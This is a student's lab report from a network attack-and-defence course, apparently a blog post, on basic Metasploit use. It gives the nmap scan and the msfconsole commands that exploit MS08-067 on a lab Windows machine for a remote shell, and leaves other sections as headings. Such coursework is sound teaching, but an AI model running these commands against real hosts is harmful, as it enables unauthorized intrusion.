2019-2020-2 20175212童皓桢《网络对抗技术》

Exp6 MSF基础应用

目录

1. 实验目标

本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。

2. 实验内容

2.1 主动攻击实践
ms08_067
  • 首先要扫描靶机是否存在漏洞:使用命令nmap -sS -A --script=smb-vuln-ms08-067 -PO 192.168.1.110
    ![在这里插入图片描述]( https://img-blog.csdnimg.cn/20200428171151903.JPG?x-oss-process=image/watermark ,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NDgyNjMzOA==,size_16,color_FFFFFF,t_70)

  • 我们可以查看到靶机的操作系统相关信息,以及具体的漏洞的一些描述信息

  • 我们使用命令msfconsole打开MSF控制台,使用命令search ms08-067 查看漏洞具体位置
    在这里插入图片描述

  • 我们根据查看到的信息,使用命令use exploit/windows/smb/ms08_067_netapi对靶机进行攻击

  • 使用以下命令进行攻击

    set RHOST 192.168.1.110
    set LPORT 5212
    set LHOST 192.168.1.106
    set target 34  //根据上面查到的操作系统信息选择
    exploit
    
  • 我们可以使用ipconfig验证一下,已经成功获取了win shell。
    ![在这里插入图片描述]( https://img-blog.csdnimg.cn/20200428172843909.JPG?x-oss-process=image/watermark ,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NDgyNjMzOA==,size_16,color_FFFFFF,t_70)

2.2 针对浏览器的攻击
ms17_010
2.3 针对客户端的攻击
Wireshark
2.4 成功应用任何一个辅助模块

3、答老师问

3.1 实验收获与感想

这次实验主要围绕metasploit工具进行多种方式的攻击。虽然实验中简单的攻击都能成功,但前提是靶机的防火墙以及杀软都已经关的一干二净,实战中不是很现实;另外msf提供的大多数功能可以说是比较老旧的,很多对于版本限制都比较复古。。

3.2 用自己的话解释什么是exploit,payload,encode

答:

  • exploit意为渗透攻击。包括扫描、嗅探、渗透等全过程的针对计算机漏洞的攻击。
  • payload意为载荷。就是用来建立目标机与攻击机稳定连接的一些内容。
  • encode意为编码器。能偶提供编码功能隐藏特征码以防查杀。
3.3 离实战还缺些什么技术或步骤

主要还是攻击前都要手动把靶机的防火墙杀软之类的关闭。。。这种直接使用msf提供的功能在实际环境中应该很不容易成功的。

4、遇到的问题及其解决方法

5、参考资料

https://www.cnblogs.com/entropy/p/6693174.html
https://gitee.com/zxy20175227/network_confrontation/releases/exp6

posted on 2020-04-29 14:51  20175212thz  阅读(174)  评论(1)    收藏  举报